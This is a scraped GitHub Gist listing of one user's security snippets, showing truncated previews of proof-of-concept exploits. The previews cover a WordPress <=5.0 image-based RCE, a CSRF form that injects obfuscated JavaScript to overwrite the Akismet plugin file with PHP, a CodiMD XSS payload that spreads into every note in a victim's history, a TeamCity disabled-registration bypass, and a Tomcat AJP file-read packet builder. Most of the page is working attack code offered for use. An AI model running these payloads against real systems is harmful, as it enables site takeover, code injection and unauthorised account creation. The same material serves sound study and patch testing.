Skip to content

Instantly share code, notes, and snippets.

@allyshka
allyshka / wordpress-rce.js
Created Mar 1, 2019
WordPress <= 5.0 exploit code for CVE-2019-8942 & CVE-2019-8943
View wordpress-rce.js
var wpnonce = '';
var ajaxnonce = '';
var wp_attached_file = '';
var imgurl = '';
var postajaxdata = '';
var post_id = 0;
var cmd = '<?php phpinfo();/*';
var cmdlen = cmd.length
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);
View enterprisedecrypt.rb
#!/usr/bin/ruby
#
# This tool is only used to "decrypt" the github enterprise source code.
#
# Run in the /data directory of the instance.
require "zlib"
KEY = "This obfuscation is intended to discourage GitHub Enterprise customers "+
"from making modifications to the VM. We know this 'encryption' is easily broken. "
View host.sh
#!/bin/bash
display_usage() {
echo "This script check connection to list of URLs with specified host."
echo -e "\nUsage:\n$0 ipsfile hostname\n"
echo -e "\nExample:\n$0 moz-com.list moz.com\n"
}
if [ $# -le 1 ]
then
@allyshka
allyshka / ajp-packet.py
Created Mar 31, 2020
AJP packet for testing Tomcat arbitrary file read (CVE-2020-1938)
View ajp-packet.py
import struct
def pack_string(s):
if s is None:
return struct.pack(">h", -1)
l = len(s)
return struct.pack(">H%dsb" % l, l, s.encode('utf8'), 0)
magic = 0x1234
prefix_code = struct.pack("b", 2) # forward request
@allyshka
allyshka / script-loader.calls
Created Apr 5, 2018
All add method calls from script-loader.php
View script-loader.calls
070: $scripts->add( 'utils', "/wp-includes/js/utils$suffix.js" );
...
078: $scripts->add( 'common', "/wp-admin/js/common$suffix.js", array('jquery', 'hoverIntent', 'utils'), false, 1 );
...
086: $scripts->add( 'wp-a11y', "/wp-includes/js/wp-a11y$suffix.js", array( 'jquery' ), false, 1 );
...
088: $scripts->add( 'sack', "/wp-includes/js/tw-sack$suffix.js", array(), '1.6.1', 1 );
...
090: $scripts->add( 'quicktags', "/wp-includes/js/quicktags$suffix.js", array(), false, 1 );
...
@allyshka
allyshka / csrf.html
Last active Apr 28, 2019
Wordpress <=5.1 PoC Akismet plugin index.php edit through CSRF
View csrf.html
<html>
<body>
<form action="http://wpxss.vh/wp-comments-post.php" method="POST">
<input type="text" name="comment" value="&lt;a title=&apos;xss&quot; style=left:0;top:0;position:fixed;display:block;width:1000%;height:1000% onmousemove=eval(atob(&quot;dmFyIGV4cGxvaXQ9ZnVuY3Rpb24oKXt2YXIgbz0iIjtjb25zb2xlLmxvZygiR2V0IG5vbmNlIHRva2VuLiIpLGpRdWVyeS5nZXQoIi93cC1hZG1pbi9wbHVnaW4tZWRpdG9yLnBocD9wbHVnaW49YWtpc21ldC9pbmRleC5waHAmU3VibWl0PVNlbGVjdCIsZnVuY3Rpb24oZSl7aWYobz1qUXVlcnkoZSkuZmluZCgiI3RlbXBsYXRlICNub25jZSIpLnZhbCgpKXtjb25zb2xlLmxvZygiU3VjY2VzcyEgbm9uY2U6ICIrbyk7dmFyIG49e25vbmNlOm8sbmV3Y29udGVudDoiPD9waHAgcGhwaW5mbygpOy8qIixhY3Rpb246ImVkaXQtdGhlbWUtcGx1Z2luLWZpbGUiLGZpbGU6ImFraXNtZXQvaW5kZXgucGhwIixwbHVnaW46ImFraXNtZXQvYWtpc21ldC5waHAiLCJkb2NzLWxpc3QiOiIifTtjb25zb2xlLmxvZygiQWRkIFBIUCBjb2RlIHRvIHBsdWdpbiBmaWxlLiIpLGpRdWVyeS5wb3N0KCIvd3AtYWRtaW4vYWRtaW4tYWpheC5waHAiLG4sZnVuY3Rpb24oZSl7Y29uc29sZS5sb2coIlN1Y2Nlc3MhIiksd2luZG93Lm9wZW4oIi93cC1jb250ZW50L3BsdWdpbnMvYWtpc21ldC8iKX0pfX0pfSxoPWRvY3VtZW50Lmdld
@allyshka
allyshka / xss-payload.js
Created Apr 25, 2019
CodiMD > 1.3.0 XSS payload
View xss-payload.js
<!-- attr="-->
<script src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.min.js>
</script>
<div ng-app>
{{constructor.constructor('eval(atob(\'dmFyIGhvc3Q9ZG9jdW1lbnQubG9jYXRpb24uaG9zdG5hbWUrIjoiK2RvY3VtZW50LmxvY2F0aW9uLnBvcnQsbm90ZWR1bW15PSIvLyIraG9zdCsiL3NvY2tldC5pby8/bm90ZUlkPU5PVEVfSUQmRUlPPTMiLHBheWxvYWQ9Ilx4M2MhLS0gYXR0cj1cIi0tXHgzZTxzY3JpcHQgc3JjPWh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2FuZ3VsYXIuanMvMS4wLjEvYW5ndWxhci5taW4uanM+PFwvc2NyaXB0PjxkaXYgbmctYXBwPnt7Y29uc3RydWN0b3IuY29uc3RydWN0b3IoJ2FsZXJ0KDEpJykoKX19PC9kaXY+XCIgLS1ceDNlXG4iOyQuZ2V0KCIvbWUiLGZ1bmN0aW9uKG8peyJvayI9PW8uc3RhdHVzJiYkLmdldCgiL2hpc3RvcnkiLGZ1bmN0aW9uKG8pe2lmKDA8by5oaXN0b3J5Lmxlbmd0aClmb3IoaCBpbiBvLmhpc3RvcnkpeyFmdW5jdGlvbihvKXt2YXIgdD1pby5jb25uZWN0KHtwYXRoOiIvc29ja2V0LmlvLyIscXVlcnk6e25vdGVJZDpvfSx0aW1lb3V0OjVlMyxyZWNvbm5lY3Rpb25BdHRlbXB0czoyMCxmb3JjZU5ldzohMH0pO3Qub24oImNvbm5lY3QiLGZ1bmN0aW9uKG8pe30pLHQub25jZSgiZG9jIixmdW5jdGlvbihvKXtjb25zb2xlLmxvZyhvLnN0ciksLTE9PW8uc3RyLnNlYXJjaCgibmctYXBwIikmJnQuZW1
@allyshka
allyshka / codimd-notes-poison.js
Created Apr 25, 2019
CodiMD > 1.3.0 add XSS to all user notes from history
View codimd-notes-poison.js
var host = document.location.hostname + ':' + document.location.port;
var notedummy = '//'+host+'/socket.io/?noteId=NOTE_ID&EIO=3';
var payload = '<!-- attr="--><script src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.min.js></script><div ng-app>{{constructor.constructor(\'alert(1)\')()}}</div>" -->\n';
$.get('/me', function(data){
if(data.status=="ok") {
$.get('/history', function(data) {
if(data.history.length > 0) {
for(h in data.history) {
var currentNoteId = data.history[h].id;
@allyshka
allyshka / akismet-xss-edit.js
Created Apr 10, 2019
Wordpress Akismet plugin index.php edit
View akismet-xss-edit.js
var exploit = function() {
var nonce = '';
var phpcode = '<?php phpinfo();/*';
var pluginurl = '/wp-admin/plugin-editor.php?plugin=akismet/index.php&Submit=Select';
var pluginupdateurl = '/wp-admin/admin-ajax.php';
var file = "akismet/index.php";
var plugin = "akismet/akismet.php";
console.log("Get nonce token.");
jQuery.get(pluginurl, function(data) {
nonce = jQuery(data).find('#template #nonce').val();
@allyshka
allyshka / teamcitylte902reg.js
Last active Mar 9, 2019
TeamCity <= 9.0.2 disabled registration bypass
View teamcitylte902reg.js
var login = 'testuser'; //логин пользователя
var password = 'SuperMEgaPa$$'; //пароль
var email = 'testusername654@mailinater.com'; // email
/* Code */
var b = BS.LoginForm;
var public_key = $F("publicKey");
var encrypted_pass = BS.Encrypt.encryptData(password, $F("publicKey"));
var parameters = 'username1='+login+'&email='+encodeURIComponent(email)+'&submitCreateUser=&publicKey='+public_key+'&encryptedPassword1='+encrypted_pass+'&encryptedRetypedPassword='+encrypted_pass;
var c = OO.extend(BS.ErrorsAwareListener, {
onDuplicateAccountError: function(b) {